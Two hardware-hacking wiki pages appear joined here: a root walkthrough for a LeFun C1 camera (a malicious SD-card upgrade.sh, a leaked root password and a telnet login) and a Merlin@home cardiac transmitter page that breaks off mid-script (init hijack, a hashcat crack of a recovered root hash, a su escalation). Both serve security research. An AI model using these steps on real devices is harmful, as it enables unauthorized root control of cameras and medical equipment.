The LeFun C1 wireless surveillance camera is a network (Wi-Fi/Ethernet) camera with IR LEDs, provided by LeFun and available on Amazon.com.<br />
<br />
<gallery><br />
File:Cloudipcam_front.jpg<br />
File:Cloudipcam_profile.jpg<br />
File:Cloudipcam_back.jpg<br />
</gallery><br />
<br />
== Disassembly ==<br />
The base of the camera is attached with four small Phillips screws hidden under silicone rubber feet. Remove all four and the base comes off, exposing the board.<br />
<br />
<gallery><br />
File:Cloudipcam_bottom.jpg<br />
File:Cloudipcam_board.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on UART (3.3 V) at 38400 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Cloudipcam_UART_pins.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
U-Boot is available on boot and its init could probably be hijacked; thankfully there is a better option that does not require access to the internals.<br />
<br />
[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]<br />
<br />
The firmware for this model was not available for download elsewhere, and I didn't feel like waiting for the firmware to download over UART at 38.4k baud, so we will resort to hot air and the MiniPro TL866CS. The SPI flash, model mxic25l12835f, was removed and dumped; the issue I had was that from 0x0 to 0xC00000 every 4 bytes were swapped.<br />
<br />
'''Firmware Format'''<br />
<br />
Raw data from the chip has an interesting pattern to it.<br />
<br />
From U-Boot<br />
<br />
<pre>=> md.b 0x02000000 130<br />
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........<br />
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................<br />
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................<br />
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.<br />
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......<br />
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....<br />
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre><br />
<br />
Dumped from the chip.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15<br />
00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|<br />
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|<br />
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|<br />
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|<br />
*<br />
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|<br />
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|<br />
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|<br />
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre><br />
<br />
Let's reorder the bytes.<br />
<br />
<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre><br />
<br />
Merging the byte-swapped first 0xC00000 bytes with the untouched remainder gives us the entire image.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged <br />
<br />
DECIMAL HEXADECIMAL DESCRIPTION<br />
--------------------------------------------------------------------------------<br />
809008 0xC5830 CRC32 polynomial table, little endian<br />
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)<br />
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16<br />
12582912 0xC00000 JFFS2 filesystem, little endian</pre><br />
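The word swap and merge described above, as an added Python example that is not part of the original page: it reverses each 4-byte word in the first 0xC00000 bytes (the same transform as the objcopy --reverse-bytes=4 command), passes the rest through untouched, and checks the result against the "GM8126" and 55 aa markers visible in the U-Boot dump. The sample dump is constructed from the first hexdump line on the page, not the real flash image.<br />

```python
"""Undo the 32-bit word swap found in the first 0xC00000 bytes of the SPI flash
dump and sanity-check the result against the bytes U-Boot shows at 0x02000000."""

SWAPPED_REGION_END = 0xC00000   # page: every 4 bytes swapped from 0x0 to 0xC00000
WORD = 4


def unswap_words(dump: bytes, region_end: int = SWAPPED_REGION_END) -> bytes:
    """Reverse the byte order of each 4-byte word inside [0, region_end); bytes at
    and beyond region_end (the JFFS2 area on the page) are passed through unchanged."""
    end = min(region_end, len(dump))
    if end % WORD:
        raise ValueError("swapped region must be a whole number of 32-bit words")
    fixed = bytearray(end)
    for i in range(0, end, WORD):
        fixed[i:i + WORD] = dump[i:i + WORD][::-1]
    return bytes(fixed) + dump[end:]


def header_checks(image: bytes) -> dict:
    """Markers from the page's U-Boot dump that a correctly unswapped image must show:
    the "GM8126" string at offset 0 and the 55 aa pair at 0xfe."""
    return {
        "soc_magic": image[:6] == b"GM8126",
        "tail_marker": image[0xFE:0x100] == b"\x55\xaa",
    }


# Constructed sample dump (not the real flash image): the first 16 bytes of the
# page's `hd` output, zero padding, the aa 55 marker as stored on the chip, then
# 0xff filler and a tail placed outside the swapped region so it must survive as-is.
SAMPLE_DUMP = (
    bytes.fromhex("31384d47000036320001000000010000")
    + b"\x00" * (0xFC - 16)
    + bytes.fromhex("aa550000")
    + b"\xff" * 16
)
SAMPLE_TAIL = b"untouched region"


def fix_sample(region_end: int = 0x100) -> bytes:
    """Unswap only the first 0x100 bytes of the constructed dump (stand-in for 0xC00000)."""
    return unswap_words(SAMPLE_DUMP + SAMPLE_TAIL, region_end)


if __name__ == "__main__":
    fixed = fix_sample()
    print(fixed[:16].hex(" "))      # 47 4d 38 31 32 36 00 00 ... as in the U-Boot dump
    print(header_checks(fixed))
```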
<br />
'''Filesystem'''<br />
<br />
The notable data includes the root filesystem.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls<br />
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8<br />
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9<br />
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5<br />
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6<br />
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/<br />
1A100 _1A100.extracted 9FD828<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/<br />
168.cpio cpio-root<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/<br />
bin dev etc init lib mnt proc project root sbin sys tmp usr var<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/<br />
welcome.txt<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!</pre><br />
<br />
And the config storage.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R<br />
jffs2-root/fs_1/:<br />
dev_data ipc_data latest_dhcp_ip_eth0 system_data<br />
<br />
jffs2-root/fs_1/dev_data:<br />
system_config<br />
<br />
jffs2-root/fs_1/ipc_data:<br />
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml<br />
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml<br />
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml<br />
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml<br />
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml<br />
<br />
jffs2-root/fs_1/ipc_data/dps:<br />
cacs<br />
<br />
jffs2-root/fs_1/ipc_data/dps/cacs:<br />
61646d696e02<br />
<br />
jffs2-root/fs_1/system_data:</pre><br />
<br />
There's also an archive in /project on the root filesystem.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/<br />
<br />
total 3.2M<br />
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre><br />
<br />
It's unpacked on boot by the init script /etc/init.d/dev_init.sh, which also makes the whole tree world-writable (chmod -R 777 /project) before running dev_start.sh.<br />
<br />
<pre>#prepare project<br />
unlzma -c /project/*.tar.lzma > /tmp/project.tar<br />
rm /project/*.tar.lzma<br />
<br />
...<br />
<br />
tar -xvf /tmp/project.tar -C /project/<br />
rm -rf /tmp/project.tar<br />
chmod -R 777 /project<br />
<br />
#dev_start<br />
if [ -e /mnt/mtd/flag_debug_dev_start ]; then<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed<br />
else<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh<br />
cd /project/apps/app/ipc/data/sh<br />
./dev_start.sh<br />
fi</pre><br />
<br />
Extracting it all gives us this.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht<br />
total 14M<br />
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .<br />
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday<br />
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre><br />
<br />
Tons of good data in here! <br />
<br />
'''Gaining root'''<br />
<br />
We also have a great entry point in /project/apps/app/ipc/data/sh/sd_card_insert.sh: whenever an SD card is inserted it mounts the first partition and, if the card carries upgrade/upgrade.sh, runs it as root with no integrity check at all.<br />
<br />
<pre>#!/bin/sh<br />
<br />
#mount sd_card<br />
if [ ! -d /mnt/sd ]; then<br />
/bin/mkdir /mnt/sd<br />
fi<br />
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd<br />
<br />
#run hook<br />
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then<br />
chmod 777 /mnt/sd/upgrade/upgrade.sh<br />
sh /mnt/sd/upgrade/upgrade.sh &<br />
fi<br />
<br />
wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml<br />
<br />
rm -f 1.xml</pre><br />
<br />
What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?<br />
<br />
<pre>path_prompt=/tmp/prompt.debug<br />
path_pass=/tmp/pass.debug<br />
<br />
...<br />
<br />
#Generate ctx if needed<br />
if [ -z $ctx ]; then<br />
ctx_file=/tmp/ctx.dev<br />
if [ -e $ctx_file ]; then<br />
read ctx < $ctx_file<br />
fi<br />
<br />
if [ -z $ctx ]; then<br />
ctx=$RANDOM<br />
echo $ctx > $ctx_file<br />
fi<br />
fi<br />
<br />
...<br />
<br />
${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}<br />
<br />
...<br />
<br />
read pass < $path_pass<br />
read prompt < $path_prompt<br />
echo "pass=${pass}, prompt=${prompt}"<br />
/bin/hostname ${prompt}${promp_eth}${promp_wifi}<br />
echo "root:${pass}"|chpasswd</pre><br />
<br />
It looks like they generate a fresh root password on every boot: mipc_tool -cmd pass writes it to /tmp/pass.debug and the script feeds that to chpasswd. Everything still runs as root and the plaintext password sits in /tmp, so we could read it over the serial line, but that's not very sexy.<br />
A look at /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option: it starts telnetd on port 9527 and persists that choice with the flag file /mnt/mtd/flag_debug_telnet.<br />
<br />
<pre>#!/bin/sh<br />
<br />
port=9527<br />
file_flag=/mnt/mtd/flag_debug_telnet<br />
if [ -e ${file_flag} ]; then<br />
mode=on<br />
fi<br />
<br />
usage()<br />
{<br />
echo Usage:$0 [-m,--mode on/off] [-h,--help]<br />
exit<br />
}<br />
<br />
ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`<br />
<br />
#set -- "${ARGS}"<br />
eval set -- "${ARGS}"<br />
<br />
while true<br />
do<br />
case "$1" in<br />
-m|--mode)<br />
mode="$2"<br />
shift<br />
;;<br />
-h|--help)<br />
usage<br />
;;<br />
--)<br />
shift<br />
break<br />
;;<br />
esac<br />
shift<br />
done<br />
<br />
if [ x"${mode}" == xon ]; then<br />
if [ ! -e ${file_flag} ]; then<br />
touch ${file_flag}<br />
fi<br />
<br />
if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then<br />
telnetd -p ${port} &<br />
fi<br />
elif [ x"${mode}" == xoff ]; then<br />
if [ -e ${file_flag} ]; then<br />
rm ${file_flag}<br />
fi<br />
<br />
ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line<br />
do<br />
pid=${line%% *}<br />
kill -9 $pid<br />
done<br />
fi</pre><br />
<br />
Well well well… Let's create an upgrade folder on a vfat-formatted micro SD card and drop this script in as upgrade/upgrade.sh.<br />
<br />
<pre>#!/bin/sh<br />
sleep 45<br />
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &<br />
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre><br />
<br />
After a little while (the script sleeps 45 seconds so the camera's services are up) /tmp is linked into the web root and we can fetch the generated root password over HTTP.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug<br />
264e37dcd841b35344c68e8f95dc8b11</pre><br />
<br />
Then we can telnet to the non-standard debug port, 9527, and log in as root with that password.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ telnet 192.168.187.254 9527<br />
Trying 192.168.187.254...<br />
Connected to 192.168.187.254.<br />
Escape character is '^]'.<br />
<br />
1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root<br />
Password: <br />
|---------------------------------------------------------------------------|<br />
| A |<br />
| AAA |<br />
| AAAAA |<br />
| AAAAAAA |<br />
| AAAA AA |<br />
| A AAAA AA |<br />
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |<br />
| AAAAA AAAA AA AA AA AA AA AA AA |<br />
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |<br />
| AAAAA AA AAA AA AA AAA AA AA AA |<br />
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |<br />
|===========================================================================|<br />
| |<br />
| http://www.shenzhenmining.com |<br />
| power by (C)shenzhenmining 2012 |<br />
|---------------------------------------------------------------------------|<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"<br />
Root password is '264e37dcd841b35344c68e8f95dc8b11'<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root<br />
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/sh<br />
bin:x:1:1:bin:/bin:/bin/sh<br />
daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />
adm:x:3:4:adm:/adm:/bin/sh<br />
lp:x:4:7:lp:/var/spool/lpd:/bin/sh<br />
sync:x:5:0:sync:/bin:/bin/sync<br />
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh<br />
operator:x:11:0:Operator:/var:/bin/sh<br />
nobody:x:99:99:nobody:/home:/bin/sh<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow<br />
root:S5Ada/QN0yHBo:12963:0:99999:7:::<br />
bin:*:12963:0:99999:7:::<br />
daemon:*:12963:0:99999:7:::<br />
adm:*:12963:0:99999:7:::<br />
lp:*:12963:0:99999:7:::<br />
sync:*:12963:0:99999:7:::<br />
shutdown:*:12963:0:99999:7:::<br />
halt:*:12963:0:99999:7:::<br />
uucp:*:12963:0:99999:7:::<br />
operator:*:12963:0:99999:7:::<br />
nobody:*:12963:0:99999:7:::</pre><br />
<br />
This device has never been connected to the internet; let's see what's running on it.<br />
<br />
<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc<br />
600 root 2532 S ./mipc_tool -cmd wd -len 20 <br />
826 root 2664 S ./mipc_tool -cmd debug -server 1 <br />
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500 <br />
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500 <br />
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500 <br />
1015 root 2664 S ./mipc_tool -cmd click_listen <br />
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file<br />
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre><br />
<br />
== Future ==<br />
<br />
We need to look into mipc_tool and the mipc program itself, in particular the tcpproxy invocation above, which proxies between the local telnet port (127.0.0.1:23) and a remote host, 218.14.146.199:7024, on a camera that has never been put online.</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2872SJM Merlin at Home2017-08-09T19:21:23Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on UART (3.3V) at 115200 baud. The UART pinout is shown in the photos below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) into a version of MontaVista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to hijack init by interrupting autoboot at the bootloader and booting with init=/bin/sh on the kernel command line.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Let's crack it. It is a traditional DES crypt hash (hashcat mode 1500), so a mask attack over seven printable characters is quick:<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to log in as root over the console with the cracked password fail (root login is restricted), so what was going on with that operator user? It has UID 12 but GID 0, its home is /root, and its password field is a locked "*".<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Let's set operator's password to "test" from the init=/bin/sh shell and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Let's look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
